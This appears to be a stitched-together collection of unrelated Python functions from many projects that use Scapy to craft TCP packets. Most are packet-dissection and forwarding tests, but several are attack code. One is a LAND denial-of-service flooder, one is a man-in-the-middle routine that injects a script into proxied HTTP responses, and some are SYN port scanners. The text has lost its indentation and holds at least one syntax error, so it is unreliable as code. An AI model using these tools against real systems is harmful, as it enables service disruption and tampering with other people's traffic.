def send_pkt(iface, dst_ip_addr, message):
addr = socket.gethostbyname(dst_ip_addr)
print "sending on interface {} to IP addr {}".format(iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / TCP(
dport=1234, sport=random.randint(49152, 65535)) / message
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def test_saprouter_dissection(self):
"""Test dissection of a basic SAP Router packet. """
pkt = Ether() / IP() / TCP(dport=3299) / SAPNI() / SAPRouter()
packet = self.get_capture(pkt)[0]
self.assertIn('sapni', packet)
self.assertEqual(int(packet['sapni'].length), 24)
self.assertIn('saprouter', packet)
def __init__(self):
self.Ether = Ether()
self.IP = IP()
self.ARP = ARP()
self.TCP = TCP()
self.UDP = UDP()
self.ICMP = ICMP()
self.BOOTP = BOOTP()
self.DHCP = DHCP()
def test_sapni_pong(self):
"""Test dissection of a basic SAP NI PONG packet. """
pkt = Ether() / IP() / TCP(dport=3299) / SAPNI() / "NI_PONG\x00"
packet = self.get_capture(pkt)[0]
self.assertIn('sapni', packet)
self.assertEqual(int(packet['sapni'].length), 8)
self.assertIn('saprouter', packet)
def send_packet(self, flag_operation, message_value, process_pid):
pkt = Ether(src=get_if_hwaddr(self.iface),
dst='ff:ff:ff:ff:ff:ff',
type=TYPE_GVT)
pkt = pkt / GvtProtocol(
flag=flag_operation, value=message_value, pid=process_pid)
pkt = pkt / IP(dst=self.addr) / TCP(dport=1234,
sport=random.randint(49152, 65535))
sendp(pkt, iface=self.iface, verbose=False)
def test_02_ip_range_no_match_v4(self): for i in [62, 63, 128, 129]: # around the edges of 1.1.1.64/26 dst_ip = "1.1.1." + str(i) test_packet = Ether()/IP(src="10.11.12.13", dst=dst_ip)/TCP(sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) # test these land on KNI as they don't match due to the `/25` specified not containing the rest of the `/24`. packet = self.wait_for_packet(self.kni_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == dst_ip) assert_equals(packet.payload.dst, dst_ip)
def main():
"""Send and receive TCP packet."""
args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip', 'dscp'])
rxq = RxQueue(args.get_arg('rx_if'))
txq = TxQueue(args.get_arg('tx_if'))
src_mac = args.get_arg('src_mac')
dst_mac = args.get_arg('dst_mac')
src_ip = args.get_arg('src_ip')
dst_ip = args.get_arg('dst_ip')
dscp = int(args.get_arg('dscp'))
if 6 == ip_address(unicode(src_ip)).version:
is_ipv4 = False
else:
is_ipv4 = True
sent_packets = []
if is_ipv4:
ip_pkt = IP(src=src_ip, dst=dst_ip) / \
TCP()
else:
ip_pkt = IPv6(src=src_ip, dst=dst_ip) / \
TCP()
pkt_send = Ether(src=src_mac, dst=dst_mac) / \
ip_pkt
sent_packets.append(pkt_send)
txq.send(pkt_send)
pkt_recv = rxq.recv(2, sent_packets)
if pkt_recv is None:
raise RuntimeError('Rx timeout')
if is_ipv4:
check_ipv4(pkt_recv, dscp)
else:
check_ipv6(pkt_recv, dscp)
sys.exit(0)
def main():
iface = get_iface()
fam, hw = get_if_raw_hwaddr(
iface) # returns family and hardware address of the interface
print "sending on interface %s" % (iface)
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
# pkt 1: a non-DHCP pkt with src IP 0.0.0.0 to simulate a client which hasn't been assigned IP addr yet
# DROPPED
pkt1 = pkt / IP(src='0.0.0.0', dst='255.255.255.255') / TCP(
dport=1234, sport=random.randint(49152, 65535))
pkt1.show2() # for a developed view of the assembled packet
sendp(pkt1, iface=iface, verbose=False) # sendp works at layer 2
# pkt 2: a DHCP discover pkt with src IP 0.0.0.0
# FORWARDED
pkt2 = pkt / IP(src='0.0.0.0', dst='255.255.255.255') / UDP(
dport=67, sport=68) / BOOTP(op=1, chaddr=hw) / DHCP(
options=[('message-type', 'discover'), ('end')])
pkt2.show2()
sendp(pkt2, iface=iface, verbose=False)
# pkt 3: a DHCP request pkt with its original src IP
# FORWARDED
pkt3 = pkt / IP(dst='255.255.255.255') / UDP(dport=67, sport=68) / BOOTP(
op=1, chaddr=hw) / DHCP(options=[('message-type', 'request'), ('end')])
pkt3.show2()
sendp(pkt3, iface=iface, verbose=False)
# pkt 4: a non-DHCP pkt with its original src IP
# FORWARDED
pkt4 = pkt / IP(dst='255.255.255.255') / TCP(
dport=1234, sport=random.randint(49152, 65535))
pkt4.show2()
sendp(pkt4, iface=iface, verbose=False)
# pkt 5: a non-DHCP pkt with spoofed src IP 10.0.1.3, which doesn't exist in the DHCP bindings table
# DROPPED
pkt5 = pkt / IP(src='10.0.1.3', dst='255.255.255.255') / TCP(
dport=1234, sport=random.randint(49152, 65535))
pkt5.show2()
sendp(pkt5, iface=iface, verbose=False)
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def write_packet(self, packet, modified, to_broker):
p = MQTT(packet).show2(dump=True, indent=0)
info = "\n\nTime: {}\nTo Broker: {} \n".format(time.time(), to_broker)
if to_broker and modified:
src_ip = self.fuzzer_ip
src_port = self.fuzzer_port
dst_ip = self.broker_ip
dst_port = self.broker_port
seq = self.seq1
ack = self.ack1
elif to_broker and not modified:
src_ip = self.client_ip
src_port = self.client_port
dst_ip = self.fuzzer_ip
dst_port = self.broker_port
seq = self.seq2
ack = self.ack2
elif not to_broker and modified:
src_ip = self.fuzzer_ip
src_port = self.broker_port
dst_ip = self.client_ip
dst_port = self.client_port
seq = self.seq2
ack = self.ack2
elif not to_broker and not modified:
src_ip = self.broker_ip
src_port = self.broker_port
dst_ip = self.fuzzer_ip
dst_port = self.fuzzer_port
seq = self.seq1
ack = self.ack1
if modified:
self.pktwriter.write(info)
self.pktwriter.write(p)
else:
self.pktinputwriter.write(info)
self.pktinputwriter.write(p)
self.pktwriterpcap.write(
Ether() / IP(src=src_ip, dst=dst_ip) /
TCP(sport=src_port, dport=dst_port, seq=seq, flags='PA', ack=seq) /
packet)
# increase seq number
if to_broker and modified:
self.ack1 = self.seq1
self.seq1 += len(packet) % pow(2, 32)
elif to_broker and not modified:
self.ack2 = self.seq2
self.seq2 += len(packet) % pow(2, 32)
elif not to_broker and modified:
self.ack2 = self.seq2
self.seq2 += len(packet) % pow(2, 32)
elif not to_broker and not modified:
self.ack1 = self.seq1
self.seq1 += len(packet) % pow(2, 32)
def _mitm_http_req(self, http_req):
"""do proxy http request and response with injected payload"""
# response ack first
l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP(
src=self.http_ip, dst=self.client_ip)
ack = TCP(dport=http_req[TCP].sport,
sport=http_req[TCP].dport,
flags="A",
seq=http_req.ack,
ack=http_req.seq + 1)
sendp(l2_l3 / ack, verbose=False)
# send proxy request and get response
ip = http_req[HTTPRequest].Host.decode(encoding="ascii")
port = http_req[TCP].dport
proxy_http_req = HTTP() / http_req[HTTPRequest]
http_res = TCP_client.tcplink(proto=HTTP, ip=ip,
port=port).sr1(proxy_http_req,
verbose=False)
# inject js into payload and forward packets recursively
def rec_forward_load(load,
seq,
template_p,
total_len=None,
window_size=167):
total_len = total_len if total_len is not None else len(load)
l2 = Ether(src=self.attacker_mac, dst=self.client_mac)
l3 = IP(src=self.http_ip, dst=self.client_ip)
if len(load) > window_size:
this_load, rest_load = load[:window_size], load[window_size:]
l4 = TCP(dport=http_req[TCP].sport,
flags="PA",
seq=seq,
ack=http_req.seq + 1)
p = l2 / l3 / l4 / template_p
p = MyUtil.set_load(p, this_load, rest_len=len(rest_load) -
2) # I don't know why -2
sendp(p, verbose=False)
rec_forward_load(load=rest_load,
seq=seq + window_size,
template_p=template_p,
total_len=total_len,
window_size=window_size)
else: # last packet
l4 = TCP(dport=http_req[TCP].sport,
flags="FA",
seq=seq,
ack=http_req.seq + 1)
p = l2 / l3 / l4 / template_p
p = MyUtil.set_load(p, load, rest_len=0)
sendp(p, verbose=False)
new_load = http_res[Raw].load.replace(
b"</body>",
f"<script>{self.script}</script></body>".encode("ascii"))
rec_forward_load(load=new_load, seq=http_req.ack, template_p=http_res)
def cmd_tcp_flags(ip, port, flags, rflags, verbose, first):
"""Send TCP packets with different flags and tell what responses receives.
It can be used to analyze how the different TCP/IP stack implementations
and configurations responds to packet with various flag combinations.
Example:
\b
# habu.tcp_flags www.portantier.com
S -> SA
FS -> SA
FA -> R
SA -> R
By default, the command sends all possible flag combinations. You can
specify which flags must ever be present (reducing the quantity of
possible combinations), with the option '-f'.
Also, you can specify which flags you want to be present on the response
packets to show, with the option '-r'.
With the next command, you see all the possible combinations that have
the FIN (F) flag set and generates a response that contains the RST (R)
flag.
Example:
\b
# habu.tcp_flags -f F -r R www.portantier.com
FPA -> R
FSPA -> R
FAU -> R
"""
conf.verb = False
pkts = [(IP(dst=ip) / TCP(flags=f, dport=port)) for f in range(0, 512)]
out = "{:>8} -> {:<8}"
for pkt in pkts:
if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
if verbose:
print(pkt.summary())
ans = sr1(pkt, timeout=0.2)
if ans:
if not rflags or all(i in ans.sprintf(r"%TCP.flags%")
for i in rflags):
print(
out.format(pkt.sprintf(r"%TCP.flags%"),
ans.sprintf(r"%TCP.flags%")))
if first:
break
return True
def test_send_packet_with_answer(self):
from scapy.all import IP, TCP
sender = txscapy.ScapySender()
self.scapy_factory.registerProtocol(sender)
packet_sent = IP(dst='8.8.8.8', src='127.0.0.1') / TCP(dport=53,
sport=5300)
packet_received = IP(dst='127.0.0.1', src='8.8.8.8') / TCP(sport=53,
dport=5300)
d = sender.startSending([packet_sent])
self.scapy_factory.super_socket.send.assert_called_with(packet_sent)
sender.packetReceived(packet_received)
result = yield d
assert result[0][0][0] == packet_sent
assert result[0][0][1] == packet_received
def send_packet(self, message_value, process_pid, p_addr):
self.payload = {}
self.payload[process_pid] = message_value
pkt = Ether(src=get_if_hwaddr(self.iface),
dst='ff:ff:ff:ff:ff:ff',
type=0x800)
pkt = pkt / IP(dst=p_addr) / TCP(
dport=1234, sport=random.randint(49152, 65535)) / json.dumps(
self.payload)
sendp(pkt, iface=self.iface, verbose=False)
def craft_tcp(hdr, data, middle, sport=50000, dport=60000, seq=0):
middle = [x for x in sorted(middle) if x > 0 and x < len(data)]
middle.append(len(data))
start = 0
snd = []
rcv = []
for limit in middle:
snd.append(hdr/TCP(sport=sport, dport=dport, flags='', \
seq=seq+start)/Raw(load=data[start:limit]))
start = limit
rcv.append(hdr/TCP(sport=sport, dport=dport, flags='', \
seq=seq)/Raw(load=data))
return ([i.__class__(str(i))
for i in snd], [i.__class__(str(i)) for i in rcv])
def test_check():
"""
Tests action tree check function.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP() / TCP(flags="A"))
assert not a.check(p, logger)
p = layers.packet.Packet(IP(ttl=64) / TCP(flags="RA"))
assert a.check(p, logger)
assert a.remove_one()
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
p = layers.packet.Packet(IP(ttl=15) / TCP(flags="RA"))
assert not a.check(p, logger)
def test_multicast_sa_da(a, port_interface_mapping, exp_src_mac, exp_dst_mac):
fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80)
fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80)
exp_pkt1 = (Ether(src=exp_src_mac) /
IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))
exp_pkt2 = (Ether(src=exp_src_mac) /
IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80))
pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1},
{'port': 1, 'packet': fwd_pkt2}])
input_ports = {0, 1}
output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1},
{'port': 3, 'packet': exp_pkt1},
{'port': 4, 'packet': exp_pkt2},
{'port': 5, 'packet': exp_pkt2},
{'port': 6, 'packet': exp_pkt2}], pack, input_ports)
return output
def test_parse_num(logger):
"""
Tests parsing integers
"""
packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data"))
tamper = actions.tamper.TamperAction(None, tamper_type="options")
assert tamper.parse("TCP:options-mss:replace:1440", logger)
lpacket, rpacket = tamper.run(packet, logger)
assert lpacket["TCP"].options[0][1] == 1440
def end_fin(self, tcp):
ip = self.ip_type(src=self.remote_addr, dst=self.local_addr)
tcp = TCP(dport=self.local_port,
sport=self.remote_port,
seq=tcp.ack,
ack=tcp.seq + 1,
flags="FA")
send_local("FIN", ip / tcp, self.socket_type)
def stealth_scan(self, ip, port):
probe = sr1(IP(dst=ip) / TCP(dport=port, flags="S"),
verbose=False,
timeout=3)
if probe is not None:
if probe.haslayer(TCP) and probe.getlayer(TCP).flags == 0x12:
sr1(IP(dst=ip) / TCP(dport=port, flags="R"),
verbose=False,
timeout=3)
return [
port, "TCP", "Abierto",
self.__list_port.get_sevice("TCP", port)
]
elif probe.haslayer(ICMP):
if int(probe.getlayer(ICMP).type) == 3 and int(
probe.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]:
return [port, "TCP", "Filtrado", self.__response.sport]
def test_invalid_write(self):
"""Test invalid write vulnerability in LZC code (CVE-2015-2282)"""
test_case = read_data_file('invalid_write_testcase.data', False)
pkt = Ether()/IP()/TCP(dport=3200)/SAPNI()/Raw(str(SAPDiag(compress=1))[:-8])/test_case
packet = self.get_capture(pkt)[0]
self.assertIn('sapdiag', packet)
def writePCAP(src, dst, data):
try:
pktdump = PcapWriter(sOutfile + '.pcap', append=True, sync=True)
pktinfo = Ether() / IP(src=src[0], dst=dst[0]) / TCP(
sport=src[1], dport=dst[1]) / data
pktdump.write(pktinfo)
pktdump.close()
except Exception as Error:
#print(str(Error))
pass
def test_options_mss():
"""
Tests options-eol.
"""
pkt = TCP(options=[("MSS", 1440)])
p = layers.packet.Packet(pkt)
assert p.get("TCP", "options-mss") == 1440
p2 = layers.packet.Packet(TCP(bytes(p)))
assert p2.get("TCP", "options-mss") == 1440
p = layers.packet.Packet(TCP(options=[]))
assert p.get("TCP", "options-mss") == ""
p.set("TCP", "options-mss", 2880)
p.show()
assert len(p["TCP"].options) == 1
assert any(k == "MSS" for k, v in p["TCP"].options)
value = p.gen("TCP", "options-mss")
p.set("TCP", "options-mss", value)
p2 = TCP(bytes(p))
assert any(k == "MSS" for k, v in p2["TCP"].options)
def analyze_port(tgt, port):
logger.info(" - Analizando puerto %s" % port)
res = sr1(IP(dst=tgt)/TCP(dport=port,, flags='S'), verbose=False, timeout=0.2)
if res:
if res[TCP.flags == 18]:
logger.info(" |_ Puerto %s abierto" % port)
OPEN_PORTS.append(port)
else:
logger.debug(" |_ Puerto %s cerrado" % port)
def test_option_8(logger):
"""
Tests options 7
"""
packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data"))
tamper = actions.tamper.TamperAction(None)
assert tamper.parse("TCP:options-timestamp:replace:40000", logger)
lpacket, rpacket = tamper.run(packet, logger)
assert lpacket["TCP"].options[0][1] == (40000, 0)
def test_parse_run(logger):
"""
Tests the ability to parse
"""
packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data"))
tamper = actions.tamper.TamperAction(None)
assert tamper.parse("TCP:options-mss:corrupt", logger)
lpacket, rpacket = tamper.run(packet, logger)
assert lpacket["TCP"].options[0][1] != 0
def test_sapdiag_dissection(self):
"""Test dissection of a basic SAP Diag packet. """
pkt = Ether()/IP()/TCP(dport=3200)/SAPNI()/SAPDiag()
packet = self.get_capture(pkt)[0]
self.assertIn('sapni', packet)
self.assertEqual(int(packet['sapni'].length), 8)
self.assertIn('sapdiag', packet)
def test_option_1(logger):
"""
Tests option 1
"""
packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data"))
tamper = actions.tamper.TamperAction(None, tamper_type="options")
assert tamper.parse("TCP:options-nop:corrupt", logger)
lpacket, rpacket = tamper.run(packet, logger)
assert lpacket["TCP"].options[0][1] == ()
def analyze_port(host, port, sem):
print "[ii] Analizando el puerto %s" % port
res = sr1(IP(dst=host) / TCP(dport=port), verbose=False, timeout=0.2)
if res is not None and TCP in res:
if res[TCP].flags == 18:
OPEN_PORTS.append(port)
print "Puerto %s abierto " % port
sem.release()
def test_correct_assignment(logger):
"""
Tests that all options can be assigned
"""
for option in layers.tcp_layer.TCPLayer.scapy_options.values():
print(option)
packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data"))
tamper = actions.tamper.TamperAction(None, field="options-" + str(option.lower()), tamper_type="corrupt")
lpacket, rpacket = tamper.run(packet, logger)
assert lpacket["TCP"].options[0][0] == option
